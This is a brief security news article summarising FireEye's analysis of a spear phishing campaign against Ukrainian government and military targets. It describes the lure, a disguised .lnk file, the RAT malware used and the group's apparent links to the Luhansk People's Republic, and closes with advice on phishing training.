Researchers observed bad actors using a spear phishing campaign to target government entities in Ukraine including military departments.
In the beginning of 2019, FireEye Threat Intelligence analyzed an email sent out as part of this campaign. The email used “SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD” as its subject line. It also spoofed the sender address so that it appeared to originate from Amtrac, a defense manufacturer located in the United Kingdom.
The email came with an attachment named “Armtrac-Commercial.7z.” Clicking on this file revealed “Armtrac-Commercial.zip,” a file archive which included two benign documents downloaded from the official Amtrac website as well as a malicious .lnk file. This resource, which used a forged extension to impersonate a PDF file but which leveraged a Microsoft Word icon, executed a PowerShell script to download a second-stage payload from its command-and-control (C&C) server.
By evaluating the campaign’s compilation times, FireEye Threat Intelligence determined that the threat actor behind this email has likely been active since at least 2014. They appear to have improved their craft in that span of time by leveraging custom and open-source malware. As FireEye explains in a blog post:
The 2018 campaign used standalone EXE or self-extracting RAR (SFX) files to infect victims. However, their recent activity showed increased sophistication by leveraging malicious LNK files. The group used open-source QUASARRAT and the RATVERMIN malware, which we have not seen used by any other groups.
The security firm also found connections between the campaign and the Luhansk People’s Republic, a pro-Russia proto-state which declared its independence from Ukraine in 2014. It’s therefore no surprise that the threat actor behind this email sent out in January 2019 has focused much of its efforts on attacking Ukraine’s government since 2014.
Spear phishing email campaigns such as these serve as a reminder to organizations everywhere, especially government entities, to conduct phishing simulations with their employees. They can also use this resource to help educate their employees about some of the most common types of phishing attacks along the way.